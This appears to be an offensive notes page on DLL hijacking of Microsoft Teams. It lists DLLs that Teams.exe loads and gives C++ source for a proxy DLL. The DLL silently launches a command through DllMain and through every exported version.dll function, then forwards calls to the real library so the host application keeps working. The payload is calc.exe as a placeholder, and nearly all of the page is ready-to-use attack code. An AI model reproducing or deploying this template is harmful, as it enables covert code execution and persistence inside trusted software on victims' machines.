## Target - `%LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe` loads `version.dll` - `%LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe` loads `cscapi.dll` ## `cscapi.dll` In this case, we start from `DllMain` with a boilerplate as simple as following: ```cpp #define WIN32_LEAN_AND_MEAN #include #define MAX_LEN 1024 char processCommandLine[MAX_LEN] = "calc.exe\0"; bool onlyOnce = false; void LaunchMyShellcode() { if (onlyOnce) return; onlyOnce = true; processCommandLine[MAX_LEN - 1] = 0; STARTUPINFOA si; PROCESS_INFORMATION pi; memset(&si, 0, sizeof(si)); memset(&pi, 0, sizeof(pi)); si.cb = sizeof(STARTUPINFOA); ::CreateProcessA( nullptr, processCommandLine, nullptr, nullptr, true, CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi ); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { LaunchMyShellcode(); } return TRUE; } ``` ## Exports ```cpp #pragma comment(linker,"/EXPORT:GetFileVersionInfoExW=my_GetFileVersionInfoExW") #pragma comment(linker,"/EXPORT:GetFileVersionInfoSizeExW=my_GetFileVersionInfoSizeExW") #pragma comment(linker,"/EXPORT:GetFileVersionInfoSizeW=my_GetFileVersionInfoSizeW") #pragma comment(linker,"/EXPORT:GetFileVersionInfoW=my_GetFileVersionInfoW") #pragma comment(linker,"/EXPORT:VerQueryValueW=my_VerQueryValueW") extern "C" { BOOL CALLBACK my_GetFileVersionInfoExW( DWORD dwFlags, LPCWSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData ) { LaunchMyShellcode(); typedef BOOL(WINAPI* typeGetFileVersionInfoExW)( DWORD dwFlags, LPCWSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData ); auto _GetFileVersionInfoExW = (typeGetFileVersionInfoExW)GetProcAddress(LoadLibraryA("version.dll"), "GetFileVersionInfoExW"); return _GetFileVersionInfoExW( dwFlags, lpwstrFilename, dwHandle, dwLen, lpData ); } DWORD CALLBACK my_GetFileVersionInfoSizeExW( DWORD dwFlags, LPCWSTR lpwstrFilename, LPDWORD lpdwHandle ) { LaunchMyShellcode(); typedef DWORD(WINAPI* typeGetFileVersionInfoSizeExW)( DWORD dwFlags, LPCWSTR lpwstrFilename, LPDWORD lpdwHandle ); auto _GetFileVersionInfoSizeExW = (typeGetFileVersionInfoSizeExW)GetProcAddress(LoadLibraryA("version.dll"), "GetFileVersionInfoSizeExW"); return _GetFileVersionInfoSizeExW( dwFlags, lpwstrFilename, lpdwHandle ); } DWORD CALLBACK my_GetFileVersionInfoSizeW( LPCWSTR lptstrFilename, LPDWORD lpdwHandle ) { LaunchMyShellcode(); typedef DWORD(WINAPI* typeGetFileVersionInfoSizeW)( LPCWSTR lptstrFilename, LPDWORD lpdwHandle ); auto _GetFileVersionInfoSizeW = (typeGetFileVersionInfoSizeW)GetProcAddress(LoadLibraryA("version.dll"), "GetFileVersionInfoSizeW"); return _GetFileVersionInfoSizeW( lptstrFilename, lpdwHandle ); } BOOL CALLBACK my_GetFileVersionInfoW( LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData ) { LaunchMyShellcode(); typedef BOOL(WINAPI* typeGetFileVersionInfoW)( LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData ); auto _GetFileVersionInfoW = (typeGetFileVersionInfoW)GetProcAddress(LoadLibraryA("version.dll"), "GetFileVersionInfoW"); return _GetFileVersionInfoW( lptstrFilename, dwHandle, dwLen, lpData ); } BOOL CALLBACK my_VerQueryValueW( LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen ) { LaunchMyShellcode(); typedef BOOL(WINAPI* typeVerQueryValueW)( LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen ); auto _VerQueryValueW = (typeVerQueryValueW)GetProcAddress(LoadLibraryA("version.dll"), "VerQueryValueW"); return _VerQueryValueW( pBlock, lpSubBlock, lplpBuffer, puLen ); } } ``` ## Source